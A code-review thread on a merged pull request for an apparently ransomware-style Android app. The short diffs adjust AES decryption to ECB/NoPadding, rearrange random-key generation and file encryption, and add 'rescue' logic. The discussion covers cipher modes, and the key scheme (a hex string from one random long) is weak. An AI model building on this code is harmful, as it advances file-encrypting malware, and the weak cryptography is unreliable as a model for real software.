### PR TITLE
Adding rescue functionality && Correcting errors during  AES decyption

### PR DESCRIPTION
**Pull request by joaopandolfi**

### CODE REVIEW

File: app/src/main/java/alepacheco/com/rw/apl/Aes.java [hunk 1]
```diff
@@ -79,7 +79,7 @@ public static void decryptLarge(byte[] seed, File in, File out) throws Exception
     private static byte[] decryptAes(byte[] raw, byte[] encrypted)
             throws Exception {
         SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
-        Cipher cipher = Cipher.getInstance("AES");
+        Cipher cipher = Cipher.getInstance("AES/ECB/NoPadding");
```
Comment (alepacheco) [inline app/src/main/java/alepacheco/com/rw/apl/Aes.java]: Using ECB mode is bad in general, check ([Wikipedia AES Modes](https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Electronic_Codebook_.28ECB.29))
Maybe using CTR or CFB will be a better idea.

Why NoPadding?

File: app/src/main/java/alepacheco/com/rw/services/MyService.java [hunk 2]
```diff
@@ -69,34 +69,50 @@ public void onCreate() {
...
+                openHappyActivity();
             }else{
-
                 generateRandomId();
-                generateRandomKey();
-
-                // Well... you guess it.
-                encryptFile();
 
+                //cover possible errors with random key
```
Comment (alepacheco) [inline app/src/main/java/alepacheco/com/rw/services/MyService.java]: Why would there be an error?

File: app/src/main/java/alepacheco/com/rw/services/MyService.java [hunk 3]
```diff
@@ -121,23 +137,32 @@ private void saveEncryptedState(){
...
     /*
     * Generate and save Random key
     * */
     private void generateRandomKey(){
-        this.KEY = new byte[256];
-        r.nextBytes(this.KEY);
-        LocalStorage.getInstance(ctx).setByTag(LocalStorage.TAG_KEY,new String(this.KEY));
+        Long hex = r.nextLong();
+        String key = Long.toHexString(hex);
+        this.KEY = key.getBytes();
```
Comment (alepacheco) [inline app/src/main/java/alepacheco/com/rw/services/MyService.java]: I think this kind of side changes are confusing. 
Returning a byte[] key and doing `this.KEY = generateRandomKey();`
Will make `generateRandomKey()` deterministic (Excluding the random number generation)

File: app/src/main/java/alepacheco/com/rw/apl/Aes.java (hunk 1 above)
Comment (joaopandolfi) [inline app/src/main/java/alepacheco/com/rw/apl/Aes.java]: Thanks for that.

NoPadding: It was to correct an error that appeared in the decryption.

Comment (joaopandolfi) [inline app/src/main/java/alepacheco/com/rw/apl/Aes.java]: java.security.NoSuchAlgorithmException: Invalid transformation format:AES/NoPadding

Comment (joaopandolfi) [inline app/src/main/java/alepacheco/com/rw/apl/Aes.java]: ECB was used only in decryption mode.
Do not affect the encryption data.

Comment (alepacheco) [inline app/src/main/java/alepacheco/com/rw/apl/Aes.java]: You have to use the same mode to encrypt and decrypt

Comment (joaopandolfi) [inline app/src/main/java/alepacheco/com/rw/apl/Aes.java]: I know.
That's precisely why it's okay.
As it was, he presented an error in the decryption

Comment (joaopandolfi) [inline app/src/main/java/alepacheco/com/rw/apl/Aes.java]: Ignore that.
I found my error.
Sorry.

**Comment by alepacheco** [comment]
Great Work!!

**Pull request merged**